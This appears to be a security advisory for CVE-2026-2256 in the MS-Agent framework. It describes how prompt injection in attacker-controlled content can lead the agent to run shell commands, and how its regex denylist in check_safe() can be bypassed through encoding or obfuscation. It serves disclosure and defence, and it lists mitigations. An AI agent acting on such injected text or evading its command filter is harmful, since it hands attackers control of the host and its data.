VU#431821: MS-Agent does not properly sanitize commands sent to its shell tool, allowing for RCE

A command injection vulnerability exists in the MS-Agent framework, allowing arbitrary command execution due to unsanitized prompt input. The MS-Agent framework uses a Shell tool for executing commands on the operating system. The vulnerability arises because the software fails to adequately sanitize external content before execution through this Shell tool. An attacker can use prompt injection techniques to trick the agent into running unintended shell commands. The Shell tool attempts to restrict unsafe commands using a regular expression-based denylist in its check_safe() method. However, this denylist mechanism can be bypassed by crafted input, enabling malicious commands to reach the shell execution layer. This vulnerability, tracked as CVE-2026-2256, allows attackers to execute arbitrary operating system commands. It can be exploited when the agent processes or retrieves attacker-controlled content containing malicious command sequences. Denylist-based filtering is inherently weak and can often be circumvented through various methods like encoding or obfuscation. Successful exploitation grants the attacker the ability to execute commands with the privileges of the MS-Agent process. This could lead to system file modification, lateral movement, persistence, or data exfiltration. No vendor patch or statement was provided during coordination. Users are advised to deploy MS-Agent only in trusted environments with validated input. Agents with shell execution should be sandboxed or run with least-privilege permissions. Replacing denylists with strict allowlists and improving isolation for tool execution are also recommended mitigation strategies.